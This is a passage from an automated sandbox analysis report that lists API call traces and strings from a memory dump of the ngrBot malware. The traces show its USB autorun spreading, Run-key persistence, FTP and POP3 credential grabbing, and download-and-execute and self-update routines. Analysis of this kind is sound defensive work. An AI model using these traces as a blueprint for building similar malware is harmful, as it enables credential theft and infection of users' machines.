                                                                  • lstrlenA.KERNEL32([.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E},00000000), ref: 003DF6DE
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 003DF747
                                                                  • lstrcpyA.KERNEL32(?,00003E2F), ref: 003DF7DA
                                                                  • lstrcatA.KERNEL32(?,?), ref: 003DF7EE
                                                                    • Part of subcall function 003D1EA0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 003D1ECD
                                                                    • Part of subcall function 003D1EA0: GetLastError.KERNEL32 ref: 003D1EDA
                                                                  • lstrcatA.KERNEL32(?,003E2B84), ref: 003DF800
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 003DF813
                                                                  • lstrlenA.KERNEL32(00003E2F,?,00000000), ref: 003DF828
                                                                  • WriteFile.KERNEL32(00000000,00003E2F,00000000), ref: 003DF837
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 003DF87C
                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 003DF88B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DF8B1
                                                                  • Sleep.KERNEL32(00000032), ref: 003DF8C4
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 003DF901
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 003DF93A
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003DF97D
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 003DF984
                                                                  • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003DF98D
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 003DF9BE
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 003DF9C5
                                                                  • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003DF9CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$memset$Attributes$Createsprintf$lstrlen$wsprintf$ErrorLastLockSizeWrite_stricmplstrcat$CloseCopyDirectoryHandleSleeplstrcpy
                                                                  • String ID: %S%S\Desktop.ini$%s%s$%s\%s$%sautorun.inf$%sautorun.tmp$ERR$[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}$usbi
                                                                  • API String ID: 2867265384-3663527224
                                                                  • Opcode ID: 58c423a86e168dfa74826abf25369916911a66ac0c722bfa77702ed0d3dc4301
                                                                  • Instruction ID: 0a5726852eabc200df7fdd4edabc418808c1cf3a77b0e7399d539f7de6605f01
                                                                  • Opcode Fuzzy Hash: 58c423a86e168dfa74826abf25369916911a66ac0c722bfa77702ed0d3dc4301
                                                                  • Instruction Fuzzy Hash: 17E1D872940268BAD732D760DCC5FEA777CEB58740F0046A6F609A61C1D7B0AB84CFA5
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DEA0F
                                                                  • LoadLibraryW.KERNEL32(ws2_32.dll), ref: 003DEA22
                                                                  • LoadLibraryW.KERNEL32(secur32.dll), ref: 003DEA29
                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 003DEA30
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,003E57AC), ref: 003DEA3B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003DEA44
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  • CopyFileW.KERNEL32(0041AFB0,0041ADA0,00000000), ref: 003DEACF
                                                                    • Part of subcall function 003DD6B0: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 003DD731
                                                                    • Part of subcall function 003DD6B0: RegCloseKey.ADVAPI32(?), ref: 003DD740
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DEAFC
                                                                    • Part of subcall function 003D1AD0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 003D1AE9
                                                                  • DeleteFileW.KERNEL32(0041AFB0), ref: 003DEB2F
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DEB3A
                                                                  • DeleteFileW.KERNEL32(0041AFB0), ref: 003DEB41
                                                                  • lstrcpyA.KERNEL32(0041A920,ERR), ref: 003DEB61
                                                                  • lstrlenA.KERNEL32(003E57C0), ref: 003DEB72
                                                                  • lstrlenA.KERNEL32(003E57C0), ref: 003DEBB5
                                                                  • _snprintf.MSVCRT(00000000,00000103,003E2B10,00000539), ref: 003DEBDE
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DEC15
                                                                  • InitializeCriticalSection.KERNEL32(0041B3C8), ref: 003DEC32
                                                                  • memset.MSVCRT(?,00000000,00000206,0041A6E0,00407A80,00000001), ref: 003DEC5F
                                                                  • wsprintfW.USER32(?,%s:Zone.Identifier,0041ADA0,?,00000000,00000206,0041A6E0,00407A80,00000001), ref: 003DEC75
                                                                  • DeleteFileW.KERNEL32(?), ref: 003DEC95
                                                                  • GetLastError.KERNEL32 ref: 003DEC97
                                                                    • Part of subcall function 003D1CF0: GetFileAttributesW.KERNEL32(?), ref: 003D1CF7
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E880,00000000,00000000,00000000), ref: 003DECB2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DECBB
                                                                  • CreateThread.KERNEL32(00000000,00000000,003DE990,00000000,00000000,00000000), ref: 003DECCC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DECCF
                                                                  • lstrlenA.KERNEL32(0041B3E0), ref: 003DED26
                                                                  • lstrlenA.KERNEL32(0041AC50,?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000), ref: 003DED5E
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E770,0041B990,00000000,00000000,?,0041AC50,00000000), ref: 003DED83
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DED86
                                                                  • CreateThread.KERNEL32(00000000,00000000,003DFC90,00000000,00000000,00000000), ref: 003DEDA1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DEDA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$File$CloseCreate$HandleThread$DeleteLibraryLoadmemset$SleepTime_snprintf$AttributesCopyCriticalErrorInitializeLastMutexObjectSectionSingleSystemValueWait_vsnprintflstrcpywsprintf
                                                                  • String ID: %s:Zone.Identifier$ERR$IPC_Check$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$msnint$msnmsg$ngrBot$running$secur32.dll$wininet.dll$ws2_32.dll
                                                                  • API String ID: 4164503275-3436408089
                                                                  • Opcode ID: 0faceb84deae9a6da616910233e1e3cade944cec690d84d41e55496dcbcd1289
                                                                  • Instruction ID: 5d51e2f24f6ad0010dcb5d25a63d436741d9f98e9af8f0afaaed244d737e3d85
                                                                  • Opcode Fuzzy Hash: 0faceb84deae9a6da616910233e1e3cade944cec690d84d41e55496dcbcd1289
                                                                  • Instruction Fuzzy Hash: 8981D8B6B8136476E63277A1BC47FDB3A1C9B40F14F144113FA057E2C2DAF46A9085AE
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0041B3C8), ref: 003DE14B
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(?,?,0000002C), ref: 003DA013
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(00000000,?), ref: 003DA04F
                                                                  • GetLastError.KERNEL32 ref: 003DE17E
                                                                  • GetLastError.KERNEL32 ref: 003DE18B
                                                                  • GetLastError.KERNEL32 ref: 003DE198
                                                                  • GetLastError.KERNEL32 ref: 003DE1A5
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DE1C8
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DE22B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DE24D
                                                                  • _memicmp.MSVCRT(?,00000000,00000000), ref: 003DE259
                                                                  • MoveFileExW.KERNEL32(00000000,0041ADA0,0000000B), ref: 003DE292
                                                                  • MoveFileExW.KERNEL32(00000000,0041ADA0,00000004), ref: 003DE2A4
                                                                  • lstrcpyA.KERNEL32(0041A920,00000000), ref: 003DE2C0
                                                                  • lstrcmpA.KERNEL32(?,003E2C7C), ref: 003DE2D3
                                                                  • Sleep.KERNEL32(000007D0), ref: 003DE2FA
                                                                  • Sleep.KERNEL32(000007D0), ref: 003DE30A
                                                                    • Part of subcall function 003DBA00: memset.MSVCRT(?,00000000,000007FF), ref: 003DBA1E
                                                                    • Part of subcall function 003DBA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 003DBA42
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 003DE43A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE45D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 003DE46B
                                                                  • LeaveCriticalSection.KERNEL32(0041B3C8), ref: 003DE478
                                                                  Strings
                                                                  • bsod, xrefs: 003DE312
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 003DE405
                                                                  • [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d, xrefs: 003DE41C
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 003DE3D1
                                                                  • rebooting, xrefs: 003DE2DE
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 003DE36E
                                                                  • QUIT :%s, xrefs: 003DE2E3
                                                                  • [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s), xrefs: 003DE359
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 003DE383, 003DE3AE
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 003DE3F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep$File$CriticalMoveSectionstrtok$??3@DeleteEnterFreeHeapLeave_memicmplstrcmplstrcpylstrlenmemsetwvsprintf
                                                                  • String ID: QUIT :%s$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$bsod$rebooting
                                                                  • API String ID: 4206007775-4213298338
                                                                  • Opcode ID: 0e9d9c51ff963f0392174dedffd301eadbf14d2fb655b5940513456a4b9f5e73
                                                                  • Instruction ID: 490be749f232fd2a6582744e297119379c2f44e78112a04a2e3d0c3ca944d5ef
                                                                  • Opcode Fuzzy Hash: 0e9d9c51ff963f0392174dedffd301eadbf14d2fb655b5940513456a4b9f5e73
                                                                  • Instruction Fuzzy Hash: 1F81D5B6A00254FBD723BBA5EC4AEBE7B7CEF44710F10461BF9119A3D1D77099409A22
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0041B3C8), ref: 003DDDCF
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(?,?,0000002C), ref: 003DA013
                                                                    • Part of subcall function 003D9FF0: strtok.MSVCRT(00000000,?), ref: 003DA04F
                                                                  • strstr.MSVCRT(00000000,http://), ref: 003DDDF4
                                                                  • lstrlenA.KERNEL32(?), ref: 003DDE11
                                                                  • toupper.MSVCRT(00000000), ref: 003DDE28
                                                                  • GetLastError.KERNEL32 ref: 003DDE68
                                                                  • GetLastError.KERNEL32 ref: 003DDE71
                                                                  • GetLastError.KERNEL32 ref: 003DDE7A
                                                                  • GetLastError.KERNEL32 ref: 003DDE83
                                                                  • Sleep.KERNEL32(00003A98), ref: 003DDEA8
                                                                  • Sleep.KERNEL32(000003E8), ref: 003DDF16
                                                                  • _stricmp.MSVCRT(?,00000000), ref: 003DDF3D
                                                                  • Sleep.KERNEL32(00000032), ref: 003DDF6A
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"],?,?,?,00000000), ref: 003DE021
                                                                  • GetLastError.KERNEL32 ref: 003DE059
                                                                  • GetLastError.KERNEL32([d="%s" s="%d bytes"] Error creating process "%S" [e="%d"],?,?,?,00000000), ref: 003DE037
                                                                    • Part of subcall function 003DBA00: memset.MSVCRT(?,00000000,000007FF), ref: 003DBA1E
                                                                    • Part of subcall function 003DBA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 003DBA42
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE0DD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 003DE0EB
                                                                  • LeaveCriticalSection.KERNEL32(0041B3C8), ref: 003DE0F8
                                                                  Strings
                                                                  • ERR, xrefs: 003DDFEC
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 003DE08E
                                                                  • [d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d, xrefs: 003DE0A5
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 003DE060
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 003DE017
                                                                  • [d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s), xrefs: 003DDFFE
                                                                  • http://, xrefs: 003DDDEE
                                                                  • dlds, xrefs: 003DDE44, 003DDFA6
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 003DE042
                                                                  • [d="%s" s="%d bytes"] Error creating process "%S" [e="%d"], xrefs: 003DE030
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 003DE080
                                                                  • exe, xrefs: 003DDEE4
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sleep$CriticalSectionstrtok$??3@EnterFreeHeapLeave_stricmplstrlenmemsetstrstrtoupperwvsprintf
                                                                  • String ID: ERR$[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]$[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$dlds$exe$http://
                                                                  • API String ID: 3190375853-4059846736
                                                                  • Opcode ID: df9f295c966f5122ae8880055d8a3ad4f4780dd40f285b2b4b70f16d04ad65de
                                                                  • Instruction ID: da9e554250a5beb64ee5585cb3669c64554f1c745a9bb4d3e95b0bb81093c846
                                                                  • Opcode Fuzzy Hash: df9f295c966f5122ae8880055d8a3ad4f4780dd40f285b2b4b70f16d04ad65de
                                                                  • Instruction Fuzzy Hash: 6291C2B6A00244ABD712DB95EC86ABFB7BDEB94700F11451AF9069B3C1D770EE40C761
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF,?,00000000,?), ref: 003D7898
                                                                  • lstrlenA.KERNEL32(-00000005,00000000,00000000,?,?,?,00000000,?), ref: 003D795D
                                                                  • _snprintf.MSVCRT(0041A2B0,000001FF,003E13EC,-00000005,?,?,00000000,?), ref: 003D797B
                                                                  • _snprintf.MSVCRT(0041A4B0,000001FF,003E13EC,-00000005,?,?,00000000,?), ref: 003D79B7
                                                                  • lstrlenA.KERNEL32(0041A2B0,?,00000000,?), ref: 003D7A5A
                                                                  • lstrlenA.KERNEL32(0041A4B0), ref: 003D7A69
                                                                  • _snprintf.MSVCRT(00000000,000001FF,ftp://%s:%s@%s:%d,0041A2B0,0041A4B0,00000000,00000000), ref: 003D7AD9
                                                                  • _stricmp.MSVCRT(0041A2B0,anonymous,00000000,000001FF,ftp://%s:%s@%s:%d,0041A2B0,0041A4B0,00000000,00000000), ref: 003D7AE8
                                                                  • _snprintf.MSVCRT(00000000,000001FF,pop3://%s:%s@%s:%d,0041A2B0,0041A4B0,00000000,00000000), ref: 003D7B66
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                  • lstrcpyA.KERNEL32(0041A2B0,003E1335,?,00000000,?), ref: 003D7BBC
                                                                  • lstrcpyA.KERNEL32(0041A4B0,003E1335), ref: 003D7BC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$lstrlen$Heaplstrcpy$AllocProcess_stricmpmemset
                                                                  • String ID: %s.%s (p='%S')$%s:%s@%s:%d$FEAT$LIST$PASS$PASV$STAT$TYPE$USER$anonymous$block$ftp://%s:%s@%s:%d$ftpgrab$ftplog$pop3://%s:%s@%s:%d$popgrab$poplog
                                                                  • API String ID: 389836911-2374598668
                                                                  • Opcode ID: 5e319ed7389ad80f4f248e69f141d307bf98331ca9d6ea2016708d24fe3428c1
                                                                  • Instruction ID: 93c4c2392e0f9db7cb17e8dfa444fb22cb4903c3c021d77488de138a61585c07
                                                                  • Opcode Fuzzy Hash: 5e319ed7389ad80f4f248e69f141d307bf98331ca9d6ea2016708d24fe3428c1
                                                                  • Instruction Fuzzy Hash: 5A818C33E093916ADB33AF64AC46FEE3A649B01710F194567F804A73C2F7B49994824B
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003E0930
                                                                  • GetProcessHeap.KERNEL32 ref: 003E093D
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003E095D
                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 003E0982
                                                                  • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000,00000005,00000003), ref: 003E09BF
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
                                                                    • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                    • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
                                                                  • GetTickCount.KERNEL32 ref: 003E09CF
                                                                  • Sleep.KERNEL32 ref: 003E0A05
                                                                  • OpenMutexA.KERNEL32(001F0001,00000000,003E57AC), ref: 003E0A17
                                                                  • GetLastError.KERNEL32 ref: 003E0A27
                                                                  • GetLastError.KERNEL32 ref: 003E0A2E
                                                                  • ExitProcess.KERNEL32 ref: 003E0A32
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003E0A3D
                                                                  • _snprintf.MSVCRT(00000000,00000103,%08x,00000000,30e44aa1,00000000), ref: 003E0A60
                                                                  • ExitProcess.KERNEL32 ref: 003E0A79
                                                                  • ExitProcess.KERNEL32 ref: 003E0A98
                                                                  • GetModuleFileNameW.KERNEL32(00000000,0041AFB0,00000208), ref: 003E0ACC
                                                                  • wsprintfW.USER32(0041ADA0,%s\Microsoft\%s.exe,00000000,00000000), ref: 003E0ADE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0041ADA0,000000FF,0041AC50,00000104,00000000,00000000), ref: 003E0B06
                                                                  • lstrcpynW.KERNEL32(0041B1B8,00000000,00000208), ref: 003E0B13
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,0041B3E0,00000104,00000000,00000000), ref: 003E0B2E
                                                                  • Sleep.KERNEL32(000009C4), ref: 003E0B59
                                                                  • ExitProcess.KERNEL32 ref: 003E0B70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exitmemset$lstrlen$ByteCharErrorFileLastModuleMultiNameSleepWide_snprintf$CountExecuteHeapMutexOpenShellTick_vsnprintflstrcpynwsprintf
                                                                  • String ID: %08x$%s\Microsoft\%s.exe$30e44aa1$OPEN$ngrBot$running
                                                                  • API String ID: 2173303953-2917108782
                                                                  • Opcode ID: 6538089ac75dc441dbcc5e2ff1353eeb15020a9a869a10768152ffef778faaef
                                                                  • Instruction ID: 80fd95e48333533808185c41294b832c70153fe58fdf41648afe98b350f862a0
                                                                  • Opcode Fuzzy Hash: 6538089ac75dc441dbcc5e2ff1353eeb15020a9a869a10768152ffef778faaef
                                                                  • Instruction Fuzzy Hash: 3E51F976A803947BE722A7B1AC4BFDE3A2C9B44B11F404611F709FE2D2DAF455808766
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,003E037C,?,003E32E4,00000000,00000000,httpi), ref: 003DFE11
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE40
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003DFE47
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE5E
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE72
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFE7C
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000002), ref: 003DFE89
                                                                  • strtok.MSVCRT(?,003E19DC), ref: 003DFEA2
                                                                  • lstrcpyA.KERNEL32(00000000,003E1335), ref: 003DFEBB
                                                                  • lstrcatA.KERNEL32(00000000,003E19DC), ref: 003DFECD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DFEE4
                                                                  • _memicmp.MSVCRT(?,00000000,00000000), ref: 003DFEEF
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 003DFF0A
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF14
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 003DFF1F
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF33
                                                                  • lstrcatA.KERNEL32(00000000,003E3328), ref: 003DFF4B
                                                                  • strstr.MSVCRT(?,003E2B54), ref: 003DFF5C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DFF65
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF6B
                                                                  • strncat.MSVCRT(00000000,?,00000000), ref: 003DFF77
                                                                  • lstrcatA.KERNEL32(00000000,003E2B54), ref: 003DFF85
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFF8F
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 003DFF9A
                                                                  • lstrlenA.KERNEL32(?), ref: 003DFFAA
                                                                    • Part of subcall function 003DFD80: isalnum.MSVCRT(00000000,00000000,756F59EB,00000000,?,003DFFB9,00000000,00000000,00000000), ref: 003DFDAC
                                                                    • Part of subcall function 003DFD80: strchr.MSVCRT(-_.!~*'(),00000000,00000000), ref: 003DFDBE
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003DFFBE
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DFFCB
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 003DFFDF
                                                                  • strtok.MSVCRT(00000000,003E19DC), ref: 003DFFEC
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003E000F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E001C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E003C
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$AllocFree$strtok$Process_memicmpisalnumlstrcpystrchrstrncatstrstr
                                                                  • String ID:
                                                                  • API String ID: 423345748-0
                                                                  • Opcode ID: 7776314030eb92e533982b535381ed099873fbabf7ad05a1bff8aac9c5604b9c
                                                                  • Instruction ID: 1db263427b842fcc81f9757d02c1169591aca64c42ffe8026e0576619e646586
                                                                  • Opcode Fuzzy Hash: 7776314030eb92e533982b535381ed099873fbabf7ad05a1bff8aac9c5604b9c
                                                                  • Instruction Fuzzy Hash: 5E617E76A00295BFDB229BA5DC85EBF777CAF84700F104219F909DB380DAB4DD8187A0
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D99D5
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,00000103), ref: 003D99EF
                                                                  • WSAStartup.WS2_32(00000002,?), ref: 003D9A00
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • htons.WS2_32(00000050), ref: 003D9A28
                                                                  • GetTickCount.KERNEL32(00000050,?), ref: 003D9A3A
                                                                  • GetTickCount.KERNEL32 ref: 003D9A4D
                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 003D9A7B
                                                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 003D9A96
                                                                  • connect.WS2_32(?,?,00000010), ref: 003D9AB1
                                                                  • Sleep.KERNEL32(00000064,?,?,00000010,00000002,00000001,00000000), ref: 003D9ABE
                                                                  • GetTickCount.KERNEL32 ref: 003D9AC4
                                                                  • lstrcpyA.KERNEL32(00000000,X-a: b), ref: 003D9AFE
                                                                  • lstrcpyA.KERNEL32(00000000,Connection: Close), ref: 003D9B0C
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D9B0F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 003D9B41
                                                                  • Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000), ref: 003D9B51
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D9B5E
                                                                  • GetTickCount.KERNEL32 ref: 003D9B66
                                                                  • Sleep.KERNEL32(000009C4), ref: 003D9B7F
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 003D9BBE
                                                                  • GetTickCount.KERNEL32(?,00000000,00000000,00000000), ref: 003D9BD2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D9BE4
                                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 003D9C1E
                                                                  • closesocket.WS2_32(?), ref: 003D9C38
                                                                  • GetTickCount.KERNEL32(?,?,00000000,00000000,00000000), ref: 003D9C43
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleeplstrlensend$lstrcpymemset$Startupclosesocketconnectgethostbynamehtonsinet_addrioctlsocketsocket
                                                                  • String ID: Connection: Close$X-a: b
                                                                  • API String ID: 1989272289-3524857483
                                                                  • Opcode ID: 341925862333dea0a401c31742a6b05a5b37fd9063005b15a84647de86a6087b
                                                                  • Instruction ID: c319e2e602829af6ecc6e99fdf333643b618fd15312b8b088e21d8ab1f7a8d99
                                                                  • Opcode Fuzzy Hash: 341925862333dea0a401c31742a6b05a5b37fd9063005b15a84647de86a6087b
                                                                  • Instruction Fuzzy Hash: AE71AE73900268ABD722DBB0EC85FDE776D9B88700F114A57EA09EB2C0D6709E41CB91
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 003DAFBD
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 003DAFCB
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DAFE8
